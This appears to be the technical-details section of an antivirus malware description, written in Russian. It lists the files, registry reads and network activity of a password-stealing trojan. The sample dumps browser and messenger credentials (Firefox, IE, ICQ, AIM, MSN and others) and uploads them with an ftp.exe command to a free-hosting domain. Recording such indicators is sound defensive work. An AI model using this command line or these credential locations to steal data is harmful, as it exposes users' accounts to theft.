Техническая информация
- <LS_APPDATA>\1.exe /shtml <LS_APPDATA>\CRNJEUFU-Firefox.html
- <LS_APPDATA>\4.exe
- <LS_APPDATA>\2.exe /shtml <LS_APPDATA>\CRNJEUFU-IE.html
- <LS_APPDATA>\3.exe /shtml <LS_APPDATA>\CRNJEUFU-MSPASS.html
- <SYSTEM32>\ftp.exe -n -s:<LS_APPDATA>\ftpcmd.dat changevariable.freehostia.com
- [<HKLM>\Software\Mirabilis\ICQ\NewOwners]
- [<HKCU>\Software\Yahoo\Pager]
- [<HKCU>\Software\AIM\AIMPRO]
- [<HKCU>\Software\Paltalk]
- [<HKCU>\Software\Google\Google Talk\Accounts]
- [<HKCU>\Software\Mirabilis\ICQ\NewOwners]
- [<HKCU>\Software\Microsoft\MSNMessenger]
- [<HKLM>\Software\Miranda]
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian]
- [<HKCU>\Software\America Online\AIM6\Passwords]
- [<HKCU>\Software\Microsoft\IdentityCRL]
- [<HKCU>\Software\Microsoft\MessengerService]
- <LS_APPDATA>\ftpcmd.dat
- <LS_APPDATA>\1.exe
- <LS_APPDATA>\CRNJEUFU-IE.html
- <LS_APPDATA>\CRNJEUFU-MSPASS.html
- <LS_APPDATA>\2.exe
- %TEMP%\~1.bat
- <LS_APPDATA>\4.exe
- <LS_APPDATA>\3.exe
- %TEMP%\~1.bat
- <LS_APPDATA>\3.exe
- <LS_APPDATA>\2.exe
- <LS_APPDATA>\1.exe
- <LS_APPDATA>\4.exe
- <LS_APPDATA>\CRNJEUFU-IE.html
- <LS_APPDATA>\ftpcmd.dat
- %TEMP%\~1.bat
- <LS_APPDATA>\CRNJEUFU-MSPASS.html
- 'localhost':1037
- 'ch#######iable.freehostia.com':21
- DNS ASK ch#######iable.freehostia.com
- '<IP-адрес в локальной сети>':1035
- ClassName: 'Shell_TrayWnd' WindowName: ''